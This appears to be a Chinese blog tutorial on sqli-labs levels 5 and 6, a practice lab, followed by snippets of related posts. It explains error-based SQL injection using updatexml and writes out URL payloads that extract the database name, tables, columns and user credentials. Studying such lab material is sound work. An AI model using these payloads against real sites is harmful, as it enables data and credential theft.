Sqli labs master 5 6闖關遊戲

2021-10-09 23:28:39 字數 1651 閱讀 1779

less-5

通過盲注(and 1=1 ,and 1=2)來構造sql語句,最終發現構造語句如下

這裡我們發現並沒有返回值,通過構造sql語句爆庫也沒有任何返回值

所以我們猜測這裡可能用報錯注入

在進行爆庫之前我們要先了解報錯注入要用到的函式

updatexml(xml_document,xpath_string,new_value)

第乙個引數:xml_document是string格式,為xml文件物件的名稱,中文為doc

第二個引數:xpath_string(xpath格式的字串)

第三個引數:new_value,string格式,替換查詢到符合條件的資料

在這裡如果所用到的引數不符合以上的要求,則此函式會以報錯的形式將結果返回

例如updatexml(1,concat(),1)

其中concat()函式的作用是將其內容連線成乙個字串,所以不符合xpath_string的要求,因此,concat()中的內容會以報錯的形式返回

接下來我們構造語句查庫

?id=1』and updatexml(1,concat(0x7e,database(),0x7e),1)–+

0x7e是~的ascii的十六進製制編碼

查表?id=1%27and%20updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=『security』 limit 0,1),0x7e),1)–+

我們通過調整limit 0,1來獲得所有的table_name

查列?id=1』and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name= 'users』and table_schema='security』limit 0,1),0x7e),1)–+

爆庫?id=1』and updatexml(1,concat(0x7e,(select concat_ws(』:』,id,username,password) from users limit 0,1),0x7e),1)–+

爆庫完成

less-6

第六關和第五關的方法一樣都是報錯注入只不過構造的語句變為

?id=1" --+

五六關還有其他解法,比如雙注入啦,還有另外一種報錯注入啦

我搞了好久都沒搞明白,我弄出來的結果不知道為什麼和別人弄出來的總是差了點,等我以後弄出來了,再教大家哈

sqli labs master 第十一關

本關為post請求 輸入 admin 密碼 隨意 爆出當前資料庫 使用者名稱 payload1 admin and extractvalue 1,concat 0x7e,database 0x7e payload2 admin and extractvalue 1,concat 0x7e,selec...

sqli labs master 闖關前知識點學習

1 前期準備 知識點 開始之前,為了方便檢視sql注入語句,我在sqli labs master網頁原始碼php部分加了兩行 第一行意思是輸出資料庫語句,第二行是換行符 一 mysql 登入 1 明文密碼 在bin目錄下 輸入 mysql u 賬戶 p 密碼 2 密碼 在bin目錄下 輸入 mysq...

sqli labs master 第二,三,四關

第二關 判斷注入型別 原因 sql select from users where id id limit 0,1 未對id做任何處理無須閉合 判斷列數 order by 3 判斷顯示位 爆出資料庫 union select 1 group concat schema name 3 from inf...